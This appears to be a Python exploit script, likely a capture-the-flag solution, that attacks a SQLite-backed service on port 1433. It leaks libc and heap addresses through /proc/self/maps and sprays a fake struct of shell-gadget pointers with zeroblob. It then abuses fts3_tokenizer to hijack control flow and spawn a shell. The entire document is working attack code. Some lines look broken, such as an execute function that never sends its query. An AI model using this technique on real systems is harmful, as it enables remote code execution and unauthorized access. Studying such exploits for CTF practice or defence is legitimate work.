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Created September 22, 2022 11:57
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#!/usr/bin/env python3
import sys
from sock import Sock
import os
import sys
import struct
# In Apple M1, it is very hard to install pwntools, so just don't use it
# from pwn import *
print("Start Exploit !")
if len(sys.argv) == 2:
host = sys.argv[1]
print("Local Test")
host = os.getenv('MY_IP') or ''
print("Target: {}".format(host))
def execute(sql, last=False):
global s
return s.readuntil("> ")[:-2]
s = Sock(host, 1433)
map_raw = execute(".read /proc/self/maps")
maps = map_raw.splitlines()
libc_addr = int(maps[23][:12], 16)
heap_addr = int(maps[6][:12], 16)
spawn_shell_addr = libc_addr + 0xc96da
# spawn_shell_addr = 0xdeadbeef
shell_struct = struct.pack("<Q", 0)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
shell_struct += struct.pack("<Q", spawn_shell_addr)
execute(f"select replace(hex(zeroblob(31337)), '00', x'414E5941414E5941{shell_struct.hex()}414E5941414E5941');")
# Calc from GDB
heap_offset = 0x1221b0
shell_struct_addr = heap_addr + heap_offset
print("Struct Addr:", hex(shell_struct_addr))
shell_struct_addr_hex = struct.pack("<Q", shell_struct_addr).hex()
execute(f"select hex(fts3_tokenizer('shell', x'{shell_struct_addr_hex}'));")
# s.interactive()
s.sendline('create virtual table shell using fts3(tokenize=shell);')
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